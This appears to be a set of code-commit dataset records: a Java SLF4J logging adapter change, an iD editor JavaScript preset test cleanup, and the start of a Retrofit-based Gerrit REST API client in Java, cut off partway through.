package com.fighter0ik.slf4jandroid; import org.slf4j.helpers.MarkerIgnoringBase; import java.util.logging.Level; import java.util.regex.Matcher; import java.util.regex.Pattern; /** * Created by DS on 24.05.2016. */ public class Logger extends MarkerIgnoringBase { private final java.util.logging.Logger mLogger; // Logger( java.util.logging.Logger logger ) { mLogger = logger; } // @Override public String getName() { return mLogger.getName(); } @Override public boolean isTraceEnabled() { return mLogger.isLoggable( Level.FINEST ); } @Override public void trace( String s ) { log( Level.FINEST, "{}", new Object[]{s}, null ); } @Override public void trace( String s, Object o ) { log( Level.FINEST, s, new Object[]{o}, null ); } @Override public void trace( String s, Object o1, Object o2 ) { log( Level.FINEST, s, new Object[]{o1,o2}, null ); } @Override public void trace( String s, Object... objects ) { log( Level.FINEST, s, objects, null ); } @Override public void trace( String s, Throwable t ) { log( Level.FINEST, "{}", new Object[]{s}, t ); } @Override public boolean isDebugEnabled() { return mLogger.isLoggable( Level.FINE ) || mLogger.isLoggable( Level.FINER ); } @Override public void debug( String s ) { log( Level.FINE, "{}", new Object[]{s}, null ); } @Override public void debug( String s, Object o ) { log( Level.FINE, s, new Object[]{o}, null ); } @Override public void debug( String s, Object o1, Object o2 ) { log( Level.FINE, s, new Object[]{o1,o2}, null ); } @Override public void debug( String s, Object... objects ) { log( Level.FINE, s, objects, null ); } @Override public void debug( String s, Throwable t ) { log( Level.FINE, "{}", new Object[]{s}, t ); } @Override public boolean isInfoEnabled() { return mLogger.isLoggable( Level.INFO ) || mLogger.isLoggable( Level.CONFIG ); } @Override public void info( String s ) { log( Level.INFO, "{}", new Object[]{s}, null ); } @Override public void info( String s, Object o ) { log( Level.INFO, s, new Object[]{o}, null ); } @Override public void info( String s, Object o1, Object o2 ) { log( Level.INFO, s, new Object[]{o1,o2}, null ); } @Override public void info( String s, Object... objects ) { log( Level.INFO, s, objects, null ); } @Override public void info( String s, Throwable t ) { log( Level.INFO, "{}", new Object[]{s}, t ); } @Override public boolean isWarnEnabled() { return mLogger.isLoggable( Level.WARNING ); } @Override public void warn( String s ) { log( Level.WARNING, "{}", new Object[]{s}, null ); } @Override public void warn( String s, Object o ) { log( Level.WARNING, s, new Object[]{o}, null ); } @Override public void warn( String s, Object o1, Object o2 ) { log( Level.WARNING, s, new Object[]{o1,o2}, null ); } @Override public void warn( String s, Object... objects ) { log( Level.WARNING, s, objects, null ); } @Override public void warn( String s, Throwable t ) { log( Level.WARNING, "{}", new Object[]{s}, t ); } @Override public boolean isErrorEnabled() { return mLogger.isLoggable( Level.SEVERE ); } @Override public void error( String s ) { log( Level.SEVERE, "{}", new Object[]{s}, null ); } @Override public void error( String s, Object o ) { log( Level.SEVERE, s, new Object[]{o}, null ); } @Override public void error( String s, Object o1, Object o2 ) { log( Level.SEVERE, s, new Object[]{o1,o2}, null ); } @Override public void error( String s, Object... objects ) { log( Level.SEVERE, s, objects, null ); } @Override public void error( String s, Throwable t ) { log( Level.SEVERE, "{}", new Object[]{s}, t ); } // private void log( Level level, String format, Object[] objects, Throwable throwable ) { if ( !mLogger.isLoggable( level ) ) return; LogRecord record = new LogRecord( level, slf4jFormatToJulFormat( format ) ); record.setLoggerName( mLogger.getName() ); record.setParameters( objects ); record.setThrown( throwable ); setLogRecordSource( record ); mLogger.log( record ); } // private String slf4jFormatToJulFormat( String format ) { int i = 0; StringBuffer buffer = new StringBuffer(); Pattern pattern = Pattern.compile( "\\{\\s*\\}" ); Matcher matcher = pattern.matcher( format ); while ( matcher.find() ) matcher.appendReplacement( buffer, ("{"+(i++)+"}") ); matcher.appendTail( buffer ); return buffer.toString(); } private void setLogRecordSource( LogRecord record ) { String thisClassName = getClass().getName(); boolean thisClassFound = false; new Throwable().printStackTrace(); StackTraceElement[] elements = new Throwable().getStackTrace(); for ( StackTraceElement element : elements ) { if ( element.getClassName().startsWith( thisClassName ) ) { System.err.println( "FOUND: "+element.toString() ); thisClassFound = true; } else if ( thisClassFound ) { System.err.println( element.toString() ); record.setSourceClassName( element.getClassName() ); record.setSourceMethodName( element.getMethodName() ); break; } } } }
lib/src/main/java/com/fighter0ik/slf4jandroid/Logger.java
package com.fighter0ik.slf4jandroid; import org.slf4j.helpers.MarkerIgnoringBase; import java.util.logging.Level; import java.util.regex.Matcher; import java.util.regex.Pattern; /** * Created by DS on 24.05.2016. */ public class Logger extends MarkerIgnoringBase { private final java.util.logging.Logger mLogger; // Logger( java.util.logging.Logger logger ) { mLogger = logger; } // @Override public String getName() { return mLogger.getName(); } @Override public boolean isTraceEnabled() { return mLogger.isLoggable( Level.FINEST ); } @Override public void trace( String s ) { log( Level.FINEST, "{}", new Object[]{s}, null ); } @Override public void trace( String s, Object o ) { log( Level.FINEST, s, new Object[]{o}, null ); } @Override public void trace( String s, Object o1, Object o2 ) { log( Level.FINEST, s, new Object[]{o1,o2}, null ); } @Override public void trace( String s, Object... objects ) { log( Level.FINEST, s, objects, null ); } @Override public void trace( String s, Throwable t ) { log( Level.FINEST, "{}", new Object[]{s}, t ); } @Override public boolean isDebugEnabled() { return mLogger.isLoggable( Level.FINE ) || mLogger.isLoggable( Level.FINER ); } @Override public void debug( String s ) { log( Level.FINE, "{}", new Object[]{s}, null ); } @Override public void debug( String s, Object o ) { log( Level.FINE, s, new Object[]{o}, null ); } @Override public void debug( String s, Object o1, Object o2 ) { log( Level.FINE, s, new Object[]{o1,o2}, null ); } @Override public void debug( String s, Object... objects ) { log( Level.FINE, s, objects, null ); } @Override public void debug( String s, Throwable t ) { log( Level.FINE, "{}", new Object[]{s}, t ); } @Override public boolean isInfoEnabled() { return mLogger.isLoggable( Level.INFO ) || mLogger.isLoggable( Level.CONFIG ); } @Override public void info( String s ) { log( Level.INFO, "{}", new Object[]{s}, null ); } @Override public void info( String s, Object o ) { log( Level.INFO, s, new Object[]{o}, null ); } @Override public void info( String s, Object o1, Object o2 ) { log( Level.INFO, s, new Object[]{o1,o2}, null ); } @Override public void info( String s, Object... objects ) { log( Level.INFO, s, objects, null ); } @Override public void info( String s, Throwable t ) { log( Level.INFO, "{}", new Object[]{s}, t ); } @Override public boolean isWarnEnabled() { return mLogger.isLoggable( Level.WARNING ); } @Override public void warn( String s ) { log( Level.WARNING, "{}", new Object[]{s}, null ); } @Override public void warn( String s, Object o ) { log( Level.WARNING, s, new Object[]{o}, null ); } @Override public void warn( String s, Object o1, Object o2 ) { log( Level.WARNING, s, new Object[]{o1,o2}, null ); } @Override public void warn( String s, Object... objects ) { log( Level.WARNING, s, objects, null ); } @Override public void warn( String s, Throwable t ) { log( Level.WARNING, "{}", new Object[]{s}, t ); } @Override public boolean isErrorEnabled() { return mLogger.isLoggable( Level.SEVERE ); } @Override public void error( String s ) { log( Level.SEVERE, "{}", new Object[]{s}, null ); } @Override public void error( String s, Object o ) { log( Level.SEVERE, s, new Object[]{o}, null ); } @Override public void error( String s, Object o1, Object o2 ) { log( Level.SEVERE, s, new Object[]{o1,o2}, null ); } @Override public void error( String s, Object... objects ) { log( Level.SEVERE, s, objects, null ); } @Override public void error( String s, Throwable t ) { log( Level.SEVERE, "{}", new Object[]{s}, t ); } // private void log( Level level, String format, Object[] objects, Throwable throwable ) { if ( !mLogger.isLoggable( level ) ) return; LogRecord record = new LogRecord( level, slf4jFormatToJulFormat( format ) ); record.setLoggerName( mLogger.getName() ); record.setParameters( objects ); record.setThrown( throwable ); setLogRecordSource( record ); mLogger.log( record ); } // private String slf4jFormatToJulFormat( String format ) { int i = 0; StringBuffer buffer = new StringBuffer(); Pattern pattern = Pattern.compile( "\\{\\s*\\}" ); Matcher matcher = pattern.matcher( format ); while ( matcher.find() ) matcher.appendReplacement( buffer, ("{"+(i++)+"}") ); matcher.appendTail( buffer ); return buffer.toString(); } private void setLogRecordSource( LogRecord record ) { String thisClassName = getClass().getName(); boolean thisClassFound = false; new Throwable().printStackTrace(); StackTraceElement[] elements = new Throwable().getStackTrace(); for ( StackTraceElement element : elements ) { if ( element.getClassName().startsWith( thisClassName ) ) { System.out.println( "FOUND: "+element.toString() ); thisClassFound = true; } else if ( thisClassFound ) { System.out.println( element.toString() ); record.setSourceClassName( element.getClassName() ); record.setSourceMethodName( element.getMethodName() ); break; } } } }
debug stack trace for calls to Logger
lib/src/main/java/com/fighter0ik/slf4jandroid/Logger.java
debug stack trace for calls to Logger
<ide><path>ib/src/main/java/com/fighter0ik/slf4jandroid/Logger.java <ide> { <ide> if ( element.getClassName().startsWith( thisClassName ) ) <ide> { <del> System.out.println( "FOUND: "+element.toString() ); <add> System.err.println( "FOUND: "+element.toString() ); <ide> thisClassFound = true; <ide> } <ide> else if ( thisClassFound ) <ide> { <del> System.out.println( element.toString() ); <add> System.err.println( element.toString() ); <ide> record.setSourceClassName( element.getClassName() ); <ide> record.setSourceMethodName( element.getMethodName() ); <ide> break;
JavaScript
isc
38c208f821793aa8266233ea27db89638d6b81cc
0
digidem/iD,ngageoint/hootenanny-ui,1ec5/iD,bagage/iD,digidem/iD,kartta-labs/iD,AndreasHae/iD,mapmeld/iD,openstreetmap/iD,edpop/iD,zbycz/iD,1ec5/iD,AndreasHae/iD,bagage/iD,zbycz/iD,morray/iD,ngageoint/hootenanny-ui,energiekollektiv/openmod.sh-id,tbicr/iD,kepta/iD,bagage/iD,andreic-telenav/iD,mapmeld/iD,edpop/iD,energiekollektiv/openmod.sh-id,AndreasHae/iD,edpop/iD,openstreetmap/iD,morray/iD,mapmeld/iD,kartta-labs/iD,kartta-labs/iD,1ec5/iD,andreic-telenav/iD,openstreetmap/iD,ngageoint/hootenanny-ui,tbicr/iD,kepta/iD
describe("iD.presets", function() { var p = { point: { tags: {}, geometry: ['point'] }, line: { tags: {}, geometry: ['line'] }, residential: { tags: { highway: 'residential' }, geometry: ['line'] }, park: { tags: { leisure: 'park' }, geometry: ['point', 'area'] } }; var c = iD.presets().load({presets: p}); describe("#match", function() { it("returns a collection containing presets matching a geometry and tags", function() { var way = iD.Way({tags: { highway: 'residential'}}), graph = iD.Graph([way]); expect(c.match(way, graph).id).to.eql('residential'); }); it("returns the appropriate fallback preset when no tags match", function() { var point = iD.Node(), line = iD.Way({tags: {foo: 'bar'}}), graph = iD.Graph([point, line]); expect(c.match(point, graph).id).to.eql('point'); expect(c.match(line, graph).id).to.eql('line'); }); }); });
test/spec/presets.js
describe("iD.presets", function() { var p = { point: { tags: {}, geometry: ['point'] }, line: { tags: {}, geometry: ['line'] }, residential: { tags: { highway: 'residential' }, geometry: ['line'] }, park: { tags: { leisure: 'park' }, geometry: ['point', 'area'] } }; var c = iD.presets().load({presets: p}), w = iD.Way({tags: { highway: 'residential'}}), g = iD.Graph().replace(w); describe("#match", function() { it("returns a collection containing presets matching a geometry and tags", function() { var way = iD.Way({tags: { highway: 'residential'}}), graph = iD.Graph([way]); expect(c.match(way, graph).id).to.eql('residential'); }); it("returns the appropriate fallback preset when no tags match", function() { var point = iD.Node(), line = iD.Way({tags: {foo: 'bar'}}), graph = iD.Graph([point, line]); expect(c.match(point, graph).id).to.eql('point'); expect(c.match(line, graph).id).to.eql('line'); }); }); });
Remove unused
test/spec/presets.js
Remove unused
<ide><path>est/spec/presets.js <ide> } <ide> }; <ide> <del> var c = iD.presets().load({presets: p}), <del> w = iD.Way({tags: { highway: 'residential'}}), <del> g = iD.Graph().replace(w); <add> var c = iD.presets().load({presets: p}); <ide> <ide> describe("#match", function() { <ide> it("returns a collection containing presets matching a geometry and tags", function() {
Java
apache-2.0
e6ef09de28ee0a2583f041b697b505fedfaf0bb0
0
jruesga/rview,jruesga/rview,jruesga/rview
/* * Copyright (C) 2016 Jorge Ruesga * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.ruesga.rview.gerrit; import android.net.Uri; import android.support.annotation.NonNull; import android.support.annotation.Nullable; import android.text.format.DateUtils; import com.burgstaller.okhttp.AuthenticationCacheInterceptor; import com.burgstaller.okhttp.CachingAuthenticatorDecorator; import com.burgstaller.okhttp.DispatchingAuthenticator; import com.burgstaller.okhttp.basic.BasicAuthenticator; import com.burgstaller.okhttp.digest.CachingAuthenticator; import com.burgstaller.okhttp.digest.Credentials; import com.burgstaller.okhttp.digest.DigestAuthenticator; import com.google.gson.annotations.Since; import com.ruesga.rview.gerrit.filter.AccountQuery; import com.ruesga.rview.gerrit.filter.ChangeQuery; import com.ruesga.rview.gerrit.filter.GroupQuery; import com.ruesga.rview.gerrit.filter.Option; import com.ruesga.rview.gerrit.model.*; import java.util.ArrayList; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; import okhttp3.Interceptor; import okhttp3.OkHttpClient; import okhttp3.Request; import okhttp3.RequestBody; import okhttp3.ResponseBody; import okhttp3.logging.HttpLoggingInterceptor; import retrofit2.Retrofit; import retrofit2.adapter.rxjava.RxJavaCallAdapterFactory; import retrofit2.converter.gson.GsonConverterFactory; import rx.Observable; public class GerritApiClient implements GerritApi { private final String mEndPoint; private final GerritApi mService; private final PlatformAbstractionLayer mAbstractionLayer; private long mLastServerVersionCheck = 0; ServerVersion mServerVersion; private final ApiVersionMediator mMediator = new ApiVersionMediator() { @Override public WhitespaceType resolveWhiteSpaceType(WhitespaceType type) { if (mServerVersion.getVersion() < 2.12) { return null; } return type; } @Override public IgnoreWhitespaceType resolveIgnoreWhiteSpaceType(IgnoreWhitespaceType type) { if (mServerVersion.getVersion() >= 2.12) { return null; } return type; } }; public GerritApiClient(String endpoint, Authorization authorization, PlatformAbstractionLayer abstractionLayer) { mAbstractionLayer = abstractionLayer; mEndPoint = endpoint; DispatchingAuthenticator authenticator = null; if (authorization != null && !authorization.isAnonymousUser()) { final Credentials credentials = new Credentials( authorization.mUsername, authorization.mPassword); final BasicAuthenticator basicAuthenticator = new BasicAuthenticator(credentials); final DigestAuthenticator digestAuthenticator = new DigestAuthenticator(credentials); authenticator = new DispatchingAuthenticator.Builder() .with("digest", digestAuthenticator) .with("basic", basicAuthenticator) .build(); } // OkHttp client OkHttpClient.Builder clientBuilder = OkHttpHelper.getSafeClientBuilder(); clientBuilder.followRedirects(true) .readTimeout(60000, java.util.concurrent.TimeUnit.MILLISECONDS) .followSslRedirects(true) .addInterceptor(createConnectivityCheckInterceptor()) .addInterceptor(createLoggingInterceptor()) .addInterceptor(createHeadersInterceptor()); if (authorization != null && !authorization.isAnonymousUser()) { final Map<String, CachingAuthenticator> authCache = new ConcurrentHashMap<>(); clientBuilder .authenticator(new CachingAuthenticatorDecorator(authenticator, authCache)) .addInterceptor(new AuthenticationCacheInterceptor(authCache)); } OkHttpClient client = clientBuilder.build(); // Gson adapter GsonConverterFactory gsonFactory = GsonConverterFactory.create( GsonHelper.createGerritGsonBuilder(true, mAbstractionLayer).create()); // RxJava adapter RxJavaCallAdapterFactory rxAdapter = RxJavaCallAdapterFactory.create(); // Retrofit Retrofit retrofit = new Retrofit.Builder() .baseUrl(endpoint) .client(client) .addConverterFactory(gsonFactory) .addCallAdapterFactory(rxAdapter) .build(); // Build the api mService = retrofit.create(GerritApi.class); } private HttpLoggingInterceptor createLoggingInterceptor() { HttpLoggingInterceptor logging = new HttpLoggingInterceptor(mAbstractionLayer::log); logging.setLevel(mAbstractionLayer.isDebugBuild() ? HttpLoggingInterceptor.Level.BODY : HttpLoggingInterceptor.Level.BASIC); return logging; } private Interceptor createHeadersInterceptor() { return chain -> { Request original = chain.request(); Request.Builder requestBuilder = original.newBuilder(); if (!mAbstractionLayer.isDebugBuild()) { requestBuilder.header("Accept", "application/json"); } Request request = requestBuilder.build(); return chain.proceed(request); }; } private Interceptor createConnectivityCheckInterceptor() { return chain -> { if (!mAbstractionLayer.hasConnectivity()) { throw new NoConnectivityException(); } return chain.proceed(chain.request()); }; } private <T> Observable<T> withVersionRequestCheck(final Observable<T> observable) { return Observable.fromCallable(() -> { long now = System.currentTimeMillis(); if (mServerVersion == null || (now - mLastServerVersionCheck > DateUtils.DAY_IN_MILLIS)) { mServerVersion = getServerVersion().toBlocking().first(); mLastServerVersionCheck = now; } return observable.toBlocking().first(); }); } private Observable<ServerVersion> andCacheVersion(final Observable<ServerVersion> observable) { return Observable.fromCallable(() -> { mServerVersion = observable.toBlocking().first(); return mServerVersion; }); } @SuppressWarnings("unchecked") private <T> List<T> filterByVersion(List<T> o) { if (o == null) { return null; } if (mServerVersion == null) { mServerVersion = getServerVersion().toBlocking().first(); } ArrayList<T> filter = new ArrayList<>(o.size()); for (T t : o) { boolean isSupported = true; try { Since a = t.getClass().getDeclaredField(t.toString()).getAnnotation(Since.class); if (a != null && a.value() > mServerVersion.getVersion()) { isSupported = false; } } catch (Exception e) { // Ignore } if (isSupported) { filter.add(t); } } return filter; } // =============================== // Non-Api operations // =============================== private String toUnauthenticatedEndpoint(String endPoint) { return endPoint.endsWith("/a/") ? endPoint.substring(0, endPoint.length() - 2) : endPoint; } @Override public Uri getChangeUri(@NonNull String changeId) { return Uri.parse(String.format(Locale.US, "%s#/c/%s", toUnauthenticatedEndpoint(mEndPoint), changeId)); } @Override public Uri getRevisionUri(@NonNull String changeId, @NonNull String revisionNumber) { return Uri.parse(String.format(Locale.US, "%s#/c/%s/%s", toUnauthenticatedEndpoint(mEndPoint), changeId, revisionNumber)); } @Override public Uri getDownloadRevisionUri( @NonNull String changeId, @NonNull String revisionId, @NonNull DownloadFormat format) { return Uri.parse(String.format(Locale.US, "%schanges/%s/revisions/%s/archive?format=%s", toUnauthenticatedEndpoint(mEndPoint), changeId, revisionId, format.toString().toLowerCase())); } @Override public ApiVersionMediator getApiVersionMediator() { return mMediator; } // =============================== // Gerrit access endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-access.html" // =============================== @Override public Observable<Map<String, ProjectAccessInfo>> getAccessRights(@NonNull String[] names) { return withVersionRequestCheck(mService.getAccessRights(names)); } // =============================== // Gerrit accounts endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-accounts.html" // =============================== @Override public Observable<List<AccountInfo>> getAccountsSuggestions( @NonNull String query, @Nullable Integer count) { return withVersionRequestCheck(mService.getAccountsSuggestions(query, count)); } @Override public Observable<List<AccountInfo>> getAccounts( @NonNull AccountQuery query, @Nullable Integer count, @Nullable Integer start, @Nullable List<AccountOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getAccounts(query, count, start, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<AccountInfo> getAccount(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccount(accountId)); } @Override public Observable<AccountInfo> createAccount( @NonNull String username, @NonNull AccountInput input) { return withVersionRequestCheck(mService.createAccount(username, input)); } @Override public Observable<AccountDetailInfo> getAccountDetails(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountDetails(accountId)); } @Override public Observable<String> getAccountName(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountName(accountId)); } @Override public Observable<String> setAccountName( @NonNull String accountId, @NonNull AccountNameInput input) { return withVersionRequestCheck(mService.setAccountName(accountId, input)); } @Override public Observable<Void> deleteAccountName(@NonNull String accountId) { return withVersionRequestCheck(mService.deleteAccountName(accountId)); } @Override public Observable<String> getAccountUsername(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountUsername(accountId)); } @Override public Observable<String> setAccountUsername( @NonNull String accountId, @NonNull UsernameInput input) { return withVersionRequestCheck(mService.setAccountUsername(accountId, input)); } @Override public Observable<String> isAccountActive(@NonNull String accountId) { return withVersionRequestCheck(mService.isAccountActive(accountId)); } @Override public Observable<Void> setAccountAsActive(@NonNull String accountId) { return withVersionRequestCheck(mService.setAccountAsActive(accountId)); } @Override public Observable<Void> setAccountAsInactive(@NonNull String accountId) { return withVersionRequestCheck(mService.setAccountAsInactive(accountId)); } @Override public Observable<String> getHttpPassword(@NonNull String accountId) { return withVersionRequestCheck(mService.getHttpPassword(accountId)); } @Override public Observable<String> setHttpPassword( @NonNull String accountId, @NonNull HttpPasswordInput input) { return withVersionRequestCheck(mService.setHttpPassword(accountId, input)); } @Override public Observable<Void> deleteHttpPassword(@NonNull String accountId) { return withVersionRequestCheck(mService.deleteHttpPassword(accountId)); } @Override public Observable<OAuthTokenInfo> getOAuthToken(@NonNull String accountId) { return withVersionRequestCheck(mService.getOAuthToken(accountId)); } @Override public Observable<List<EmailInfo>> getAccountEmails(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountEmails(accountId)); } @Override public Observable<EmailInfo> getAccountEmail( @NonNull String accountId, @NonNull String emailId) { return withVersionRequestCheck(mService.getAccountEmail(accountId, emailId)); } @Override public Observable<EmailInfo> createAccountEmail(@NonNull String accountId, @NonNull String emailId, @NonNull EmailInput input) { return withVersionRequestCheck(mService.createAccountEmail(accountId, emailId, input)); } @Override public Observable<Void> deleteAccountEmail(@NonNull String accountId, @NonNull String emailId) { return withVersionRequestCheck(mService.deleteAccountEmail(accountId, emailId)); } @Override public Observable<Void> setAccountPreferredEmail( @NonNull String accountId, @NonNull String emailId) { return withVersionRequestCheck(mService.setAccountPreferredEmail(accountId, emailId)); } @Override public Observable<List<SshKeyInfo>> getAccountSshKeys(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountSshKeys(accountId)); } @Override public Observable<SshKeyInfo> getAccountSshKey(@NonNull String accountId, int sshKeyId) { return withVersionRequestCheck(mService.getAccountSshKey(accountId, sshKeyId)); } @Override public Observable<SshKeyInfo> addAccountSshKey( @NonNull String accountId, @NonNull String encodedKey) { return withVersionRequestCheck(mService.addAccountSshKey(accountId, encodedKey)); } @Override public Observable<Void> deleteAccountSshKey(@NonNull String accountId, int sshKeyId) { return withVersionRequestCheck(mService.deleteAccountSshKey(accountId, sshKeyId)); } @Override public Observable<List<GpgKeyInfo>> getAccountGpgKeys(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountGpgKeys(accountId)); } @Override public Observable<GpgKeyInfo> getAccountGpgKey( @NonNull String accountId, @NonNull String gpgKeyId) { return withVersionRequestCheck(mService.getAccountGpgKey(accountId, gpgKeyId)); } @Override public Observable<Map<String, GpgKeyInfo>> addAccountGpgKeys( @NonNull String accountId, @NonNull AddGpgKeyInput input) { return withVersionRequestCheck(mService.addAccountGpgKeys(accountId, input)); } @Override public Observable<Map<String, GpgKeyInfo>> deleteAccountGpgKeys( @NonNull String accountId, @NonNull DeleteGpgKeyInput input) { return withVersionRequestCheck(mService.deleteAccountGpgKeys(accountId, input)); } @Override public Observable<AccountCapabilityInfo> getAccountCapabilities( @NonNull String accountId, @Nullable List<Capability> filter) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getAccountCapabilities(accountId, filterByVersion(filter)) .toBlocking().first())); } @Override public Observable<String> hasAccountCapability( @NonNull String accountId, @NonNull Capability capabilityId) { return withVersionRequestCheck(mService.hasAccountCapability(accountId, capabilityId)); } @Override public Observable<List<GroupInfo>> getAccountGroups(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountGroups(accountId)); } @Override public Observable<ResponseBody> getAccountAvatar( @NonNull String accountId, @Nullable Integer size) { return withVersionRequestCheck(mService.getAccountAvatar(accountId, size)); } @Override public Observable<String> getAccountAvatarChangeUrl(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountAvatarChangeUrl(accountId)); } @Override public Observable<PreferencesInfo> getAccountPreferences(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountPreferences(accountId)); } @Override public Observable<PreferencesInfo> setAccountPreferences( @NonNull String accountId, @NonNull PreferencesInput input) { return withVersionRequestCheck(mService.setAccountPreferences(accountId, input)); } @Override public Observable<DiffPreferencesInfo> getAccountDiffPreferences(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountDiffPreferences(accountId)); } @Override public Observable<DiffPreferencesInfo> setAccountDiffPreferences( @NonNull String accountId, @NonNull DiffPreferencesInput input) { return withVersionRequestCheck(mService.setAccountDiffPreferences(accountId, input)); } @Override public Observable<EditPreferencesInfo> getAccountEditPreferences(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountEditPreferences(accountId)); } @Override public Observable<EditPreferencesInfo> setAccountEditPreferences( @NonNull String accountId, @NonNull EditPreferencesInput input) { return withVersionRequestCheck(mService.setAccountEditPreferences(accountId, input)); } @Override public Observable<List<ProjectWatchInfo>> getAccountWatchedProjects(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountWatchedProjects(accountId)); } @Override public Observable<List<ProjectWatchInfo>> addOrUpdateAccountWatchedProjects( @NonNull String accountId, @NonNull List<ProjectWatchInput> input) { return withVersionRequestCheck(mService.addOrUpdateAccountWatchedProjects(accountId, input)); } @Override public Observable<Void> deleteAccountWatchedProjects( @NonNull String accountId, @NonNull List<DeleteProjectWatchInput> input) { return withVersionRequestCheck(mService.deleteAccountWatchedProjects(accountId, input)); } @Override public Observable<List<ChangeInfo>> getDefaultStarredChanges(@NonNull String accountId) { return withVersionRequestCheck(mService.getDefaultStarredChanges(accountId)); } @Override public Observable<Void> putDefaultStarOnChange( @NonNull String accountId, @NonNull String changeId) { return withVersionRequestCheck(mService.putDefaultStarOnChange(accountId, changeId)); } @Override public Observable<Void> deleteDefaultStarFromChange( @NonNull String accountId, @NonNull String changeId) { return withVersionRequestCheck(mService.deleteDefaultStarFromChange(accountId, changeId)); } @Override public Observable<List<ChangeInfo>> getStarredChanges(@NonNull String accountId) { return withVersionRequestCheck(mService.getStarredChanges(accountId)); } @Override public Observable<List<String>> getStarLabelsFromChange( @NonNull String accountId, @NonNull String changeId) { return withVersionRequestCheck(mService.getStarLabelsFromChange(accountId, changeId)); } @Override public Observable<List<String>> updateStarLabelsFromChange(@NonNull String accountId, @NonNull String changeId, @NonNull StarInput input) { return withVersionRequestCheck(mService.updateStarLabelsFromChange(accountId, changeId, input)); } @Override public Observable<List<ContributorAgreementInfo>> getContributorAgreements( @NonNull String accountId) { return withVersionRequestCheck(mService.getContributorAgreements(accountId)); } @Override public Observable<String> signContributorAgreement( @NonNull String accountId, @NonNull ContributorAgreementInput input) { return withVersionRequestCheck(mService.signContributorAgreement(accountId, input)); } // =============================== // Gerrit changes endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-changes.html" // =============================== @Override public Observable<ChangeInfo> createChange(@NonNull ChangeInput input) { return withVersionRequestCheck(mService.createChange(input)); } @Override public Observable<List<ChangeInfo>> getChanges( @NonNull ChangeQuery query, @Nullable Integer count, @Nullable Integer start, @Nullable List<ChangeOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getChanges(query, count, start, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<ChangeInfo> getChange( @NonNull String changeId, @Nullable List<ChangeOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getChange(changeId, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<ChangeInfo> getChangeDetail( @NonNull String changeId, @Nullable List<ChangeOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getChangeDetail(changeId, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<String> getChangeTopic(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeTopic(changeId)); } @Override public Observable<String> setChangeTopic(@NonNull String changeId, @NonNull TopicInput input) { return withVersionRequestCheck(mService.setChangeTopic(changeId, input)); } @Override public Observable<Void> deleteChangeTopic(@NonNull String changeId) { return withVersionRequestCheck(mService.deleteChangeTopic(changeId)); } @Override public Observable<ChangeInfo> abandonChange( @NonNull String changeId, @NonNull AbandonInput input) { return withVersionRequestCheck(mService.abandonChange(changeId, input)); } @Override public Observable<ChangeInfo> restoreChange( @NonNull String changeId, @NonNull RestoreInput input) { return withVersionRequestCheck(mService.restoreChange(changeId, input)); } @Override public Observable<ChangeInfo> rebaseChange( @NonNull String changeId, @Nullable RebaseInput input) { return withVersionRequestCheck(mService.rebaseChange(changeId, input)); } @Override public Observable<ChangeInfo> moveChange( @NonNull String changeId, @NonNull MoveInput input) { return withVersionRequestCheck(mService.moveChange(changeId, input)); } @Override public Observable<ChangeInfo> revertChange( @NonNull String changeId, @NonNull RevertInput input) { return withVersionRequestCheck(mService.revertChange(changeId, input)); } @Override public Observable<ChangeInfo> submitChange( @NonNull String changeId, @NonNull SubmitInput input) { return withVersionRequestCheck(mService.submitChange(changeId, input)); } @Override public Observable<List<ChangeInfo>> getChangesSubmittedTogether( @NonNull String changeId, @Nullable List<SubmittedTogetherOptions> options) { return withVersionRequestCheck(mService.getChangesSubmittedTogether(changeId, options)); } @Override public Observable<Void> publishDraftChange(@NonNull String changeId) { return withVersionRequestCheck(mService.publishDraftChange(changeId)); } @Override public Observable<Void> deleteDraftChange(@NonNull String changeId) { return withVersionRequestCheck(mService.deleteDraftChange(changeId)); } @Override public Observable<IncludeInInfo> getChangeIncludedIn(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeIncludedIn(changeId)); } @Override public Observable<Void> indexChange(@NonNull String changeId) { return withVersionRequestCheck(mService.indexChange(changeId)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeComments(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeComments(changeId)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeDraftComments( @NonNull String changeId) { return withVersionRequestCheck(mService.getChangeDraftComments(changeId)); } @Override public Observable<ChangeInfo> checkChange(@NonNull String changeId) { return withVersionRequestCheck(mService.checkChange(changeId)); } @Override public Observable<ChangeInfo> fixChange(@NonNull String changeId, @NonNull FixInput input) { return withVersionRequestCheck(mService.fixChange(changeId, input)); } @Override public Observable<EditInfo> getChangeEdit(@NonNull String changeId, @Nullable Option 